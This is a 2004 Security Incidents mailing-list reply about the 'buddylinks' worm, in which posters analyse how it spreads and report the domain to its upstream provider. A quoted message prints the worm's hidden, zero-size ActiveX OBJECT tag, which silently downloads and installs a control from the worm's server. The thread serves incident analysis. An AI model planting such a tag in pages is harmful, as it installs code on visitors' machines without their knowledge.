Security Incidents mailing list archives

Re: buddylinks worm

From: Jason Yates <jaywhy2 () comcast net>
Date: Tue, 10 Feb 2004 19:07:09 -0500

Jeremy Junginger wrote:

Yep!  It actually uses the follwing method:

<OBJECT ID="ShellInstaller" WIDTH=0 HEIGHT=0
CLASSID="CLSID:FDDCE9FF-1FC6-413c-80B1-37B101FDA1D4"
CODEBASE="http://download.buddylinks.net/ShellInstaller.cab#Version=1,0,0,001
">
</OBJECT>

To install ShellINstaller.INF (Size: 2,119) and ShellInstaller.ocx (Size
81,920), which is an ActiveX control.  That's all I've found so far.  Let me
know if you guys find anything else.

I contacted internap.com there upstream provider. There support guy I talked to told me email abuse () internap com and they'll look into it. I emailed the information; but I really didn't think anything would happen of it. The support rep didn't seem like he really cared. I guess I was wrong though. I can't ping buddylinks.net anymore. Although I wouldn't credit internap.com yet though; it just as likely they got DOS'd by the amount of requests and crashed.

Free trial: Astaro Security Linux -- firewall with Spam/Virus Protection

Protect your network with the comprehensive security solution that
integrates six applications for ease of use and lower TCO.

Firewall - Virus protection - Spam protection - URL blocking - VPN
- Wireless security.

Download 30-day evaluation at:
http://www.astaro.com/php/contact/securityfocus.php